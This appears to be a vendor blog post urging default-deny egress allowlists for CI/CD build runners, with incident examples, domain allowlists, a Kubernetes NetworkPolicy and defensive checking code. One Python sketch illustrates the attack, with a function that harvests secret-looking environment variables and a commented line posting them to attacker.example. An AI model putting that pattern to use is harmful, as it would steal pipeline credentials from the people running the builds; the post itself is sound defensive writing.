Does Your CI/CD Pipeline Let Build Agents Talk to Any IP on the Internet?

April 1, 2026

Go look at the network configuration for your CI/CD runners right now. GitHub Actions runners, Azure DevOps agents, GitLab CI runners, Jenkins nodes, whatever you use.

What outbound network restrictions are in place? What IPs and domains can those runners connect to? What is blocked?

If the answer is "they can reach anything," your build infrastructure is one compromised dependency away from exfiltrating every secret in your pipeline.

Some questions about your build environment

When your CI pipeline runs npm install or pip install, do you control which registries the runner can reach?

If a compromised package tried to POST your environment variables to an attacker-controlled server during the install step, would anything stop that HTTP request from leaving your network?

Do you have any monitoring or alerting on outbound connections from your build agents?

When the Trivy supply chain compromise happened in March 2026, a poisoned GitHub Action read the runner's environment variables, which contained CI/CD secrets, and exfiltrated them to attacker-controlled infrastructure. The legitimate scan still completed normally, so pipelines showed no sign of compromise.
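That pattern is simple enough to sketch in a few lines of Python. This is an illustration of the technique, not the actual payload from any incident; the regex and the endpoint are invented for the example:

```python
import re

# Env var names that secret-harvesting CI malware typically sweeps up.
# These patterns are illustrative, not taken from any real incident's code.
SECRET_PATTERNS = re.compile(r"TOKEN|SECRET|PASSWORD|KEY|CREDENTIAL", re.IGNORECASE)

def harvest_secrets(env: dict) -> dict:
    """Return the subset of environment variables that look like secrets."""
    return {k: v for k, v in env.items() if SECRET_PATTERNS.search(k)}

# The exfiltration step is then a single outbound HTTPS request -- the one
# request that default-deny egress would have blocked:
#
#   requests.post("https://attacker.example/collect",
#                 json=harvest_secrets(dict(os.environ)))
```

Nothing in that sketch needs elevated privileges. It runs with whatever permissions the build step already has.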

If your build agents had default-deny egress with an allowlist of required domains, that exfiltration would have failed. The request to the attacker's domain would have been blocked.

Did yours have that? Do they have it now?

The build environment is the most privileged, least restricted part of your infrastructure

Think about what a CI/CD runner has access to during a build:

Source code for the entire repository. Cloud credentials stored as pipeline secrets (AWS keys, Azure service principal credentials, GCP service account tokens). Package registry tokens for publishing artifacts. Deployment credentials for pushing to production. SSH keys for accessing infrastructure.

Now think about the network restrictions on the machine holding all of that. In most organizations, the answer is: none. The runner can make outbound connections to any IP on any port. It has to, the reasoning goes, because builds need to download dependencies from package registries, pull container images, and push artifacts.

That reasoning conflates "needs outbound access to specific domains" with "needs unrestricted outbound access to the entire internet." Those are not the same thing.

The supply chain numbers make the case

Supply chain attacks more than doubled in 2025, with global losses reaching 60 billion dollars (Bastion, 2026 Supply Chain Security Report). Sonatype's State of the Software Supply Chain report tracked a 200% year-over-year increase in malicious packages published to public registries. Over 70% of organizations reported experiencing at least one supply chain-related security incident in the same period.

The Verizon DBIR 2025 found that third-party breaches now account for 30% of all data breaches, double the previous year's share (DeepStrike, Supply Chain Attack Statistics 2025). The attack vector is increasingly the build pipeline itself, not the production application.

In the first half of 2025 alone, the tj-actions/changed-files compromise affected over 23,000 GitHub repositories by stealing CI runner secrets through a modified GitHub Action. The reviewdog/action-setup compromise used the same pattern. The Nx build system compromise used a stolen npm publishing token obtained through a GitHub Actions workflow vulnerability.

All of these attacks followed the same basic model: run malicious code inside a build environment, read secrets from the environment, and exfiltrate them over the network. The malicious code ran with the full permissions of the build agent. The outbound network request succeeded because nothing blocked it.

NSA and CISA published a joint advisory on defending CI/CD environments that recommends implementing network segmentation and filtering traffic to and from build infrastructure. The advisory covers poisoned pipeline execution, insufficient access controls, and insecure system configuration, all patterns seen in the incidents above. This is not a suggestion from a blog post. This is guidance from the agencies responsible for national cybersecurity.

What a CI/CD egress allowlist looks like

The set of domains a build agent genuinely needs to reach is finite and knowable. Here is a starting point for a GitHub Actions workflow that builds a Node.js application and deploys to AWS:

Package registries: registry.npmjs.org, registry.yarnpkg.com

Container registries: ghcr.io, *.docker.io, your private ECR/ACR/GCR endpoint

Cloud provider APIs: Scope these as tightly as possible. Wildcards like *.amazonaws.com or *.azure.com are dangerous because they include customer-controlled endpoints. An attacker can exfiltrate data to their own S3 bucket or Azure Blob Storage account and it will match the wildcard. Prefer specific service subdomains:

  • AWS: s3.us-east-1.amazonaws.com, sts.amazonaws.com, ecr.<region>.amazonaws.com
  • Azure: management.azure.com, <your-registry>.azurecr.io
  • GCP: storage.googleapis.com, <region>-docker.pkg.dev

GitHub itself: github.com, api.github.com, *.actions.githubusercontent.com

OS package updates: archive.ubuntu.com, security.ubuntu.com (if your runners update packages during the build)

Everything else should be denied by default. This list is a starting point. You will need to iterate based on what your builds actually require, and that iteration is part of the value: it forces you to understand your build's dependency footprint.
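Why tight entries beat wildcards is easy to demonstrate. A minimal matcher sketch, using Python's fnmatch for glob-style patterns and the hostnames from the lists above:

```python
from fnmatch import fnmatch

def allowed(host: str, allowlist: list[str]) -> bool:
    """True if host matches any allowlist entry. In glob patterns, '*'
    matches any characters, including dots -- which is exactly the
    wildcard hazard described above."""
    return any(fnmatch(host, pattern) for pattern in allowlist)

broad = ["*.amazonaws.com"]
tight = ["s3.us-east-1.amazonaws.com", "sts.amazonaws.com"]

# An attacker-controlled S3 bucket endpoint sails through the broad wildcard...
assert allowed("attacker-bucket.s3.amazonaws.com", broad)
# ...but is rejected by the tight list, which still permits what the build needs.
assert not allowed("attacker-bucket.s3.amazonaws.com", tight)
assert allowed("sts.amazonaws.com", tight)
```

The same logic applies whether the matching happens in a proxy, a DNS filter, or a firewall's FQDN rules: every wildcard entry is an invitation to find a customer-controlled subdomain that matches it.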

For self-hosted runners, this is a network firewall rule or a security group on the runner's subnet. For GitHub-hosted runners, this is harder. Standard GitHub-hosted runners provide no egress filtering capability whatsoever. You need GitHub's larger runners (a paid feature) to get VNet integration for Azure, or route through a NAT gateway with restrictive security groups in AWS. If your budget does not cover larger runners, self-hosting is the only path to egress controls on GitHub Actions.

For Azure DevOps self-hosted agents, apply an NSG to the agent subnet with outbound rules that only allow traffic to the domains above on ports 443 and 80. Deny everything else.

For GitLab CI runners on Kubernetes, this is a Kubernetes NetworkPolicy with explicit egress rules listing allowed CIDRs and ports.
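A sketch of what that policy might look like, assuming runner pods labeled app: gitlab-runner in a gitlab-runners namespace (both names are assumptions, not GitLab defaults). Note that NetworkPolicies match IPs, not domains, so the allowlist has to be maintained as CIDRs; the CIDR below is a documentation placeholder you would replace with the ranges your registries actually resolve to:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: runner-egress-allowlist
  namespace: gitlab-runners        # assumed namespace for runner pods
spec:
  podSelector:
    matchLabels:
      app: gitlab-runner           # assumed label on runner pods
  policyTypes:
    - Egress                       # selecting Egress makes unlisted egress deny-by-default
  egress:
    # DNS resolution via cluster DNS; without this, all lookups fail
    - to:
        - namespaceSelector: {}
          podSelector:
            matchLabels:
              k8s-app: kube-dns
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
    # HTTPS to allowlisted registry ranges
    - to:
        - ipBlock:
            cidr: 203.0.113.0/24   # placeholder: replace with real registry CIDRs
      ports:
        - protocol: TCP
          port: 443
```

Because the policy selects the pods for Egress, anything not matched by an egress rule is dropped, which is the default-deny posture this post argues for.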

The objection and why it does not hold

The common pushback is: "We cannot predict every domain our build will need to reach. What if a new dependency pulls from a CDN we have not allowlisted?"

This is the same argument people make against restrictive firewall rules in every other context. The answer is the same: you start with what you know, you monitor what gets blocked, and you add exceptions through a review process.
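The "monitor what gets blocked" step can start very small. A sketch that pulls rejected outbound flows out of AWS VPC Flow Log records, assuming the default space-separated 14-field format (dstaddr is field 5, dstport field 7, action field 13):

```python
def rejected_destinations(flow_log_lines: list[str]) -> set[tuple[str, str]]:
    """Collect (dstaddr, dstport) pairs for REJECTed flows from
    default-format VPC Flow Log records."""
    dests = set()
    for line in flow_log_lines:
        fields = line.split()
        # Default format: version account-id interface-id srcaddr dstaddr
        # srcport dstport protocol packets bytes start end action log-status
        if len(fields) >= 13 and fields[12] == "REJECT":
            dests.add((fields[4], fields[6]))
    return dests
```

Feed it a day of flow logs from the runner subnet and the output is the exact list of destinations to either add to the allowlist through review or investigate as attempted exfiltration.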

The alternative is unlimited egress from the most privileged environment in your infrastructure, which is exactly what most organizations currently have in place, and what attackers are increasingly targeting.

Validating your pipeline network rules

Whether your egress controls are expressed as AWS security groups, Azure NSGs, GCP firewall rules, or Kubernetes NetworkPolicies, they are network security rules. They should be validated with the same rigor as any other firewall policy.

netbobr can import AWS Security Groups, Azure NSGs, GCP Firewall Rules, Kubernetes NetworkPolicies, and Terraform plan/HCL that defines any of them. It validates firewall rules against compliance frameworks (PCI-DSS, NIST 800-53, CIS Controls, NIS2, DORA, MITRE ATT&CK) and scores them for risk. The same validation you apply to production firewall policies should apply to your pipeline network rules. If your build agent's security group allows egress to 0.0.0.0/0, netbobr will flag it the same way it would flag that rule anywhere else in your infrastructure.
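The 0.0.0.0/0 check itself is mechanical. A sketch of that kind of inspection (not netbobr's implementation) over the JSON shape returned by the AWS describe-security-groups API:

```python
def open_egress_rules(security_group: dict) -> list[dict]:
    """Return egress rules that permit all destinations, given a security
    group dict in the describe-security-groups response shape."""
    flagged = []
    for rule in security_group.get("IpPermissionsEgress", []):
        v4_open = any(r.get("CidrIp") == "0.0.0.0/0" for r in rule.get("IpRanges", []))
        v6_open = any(r.get("CidrIpv6") == "::/0" for r in rule.get("Ipv6Ranges", []))
        if v4_open or v6_open:
            flagged.append(rule)
    return flagged
```

Run against a runner subnet's security group, an empty result means the allowlist posture is at least structurally in place; any flagged rule is the unrestricted egress this post is about.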

The Trivy compromise already showed what happens when build agents have unrestricted egress. The tj-actions compromise confirmed it was not a one-time event. The question is whether your build infrastructure is still configured the same way it was before those incidents.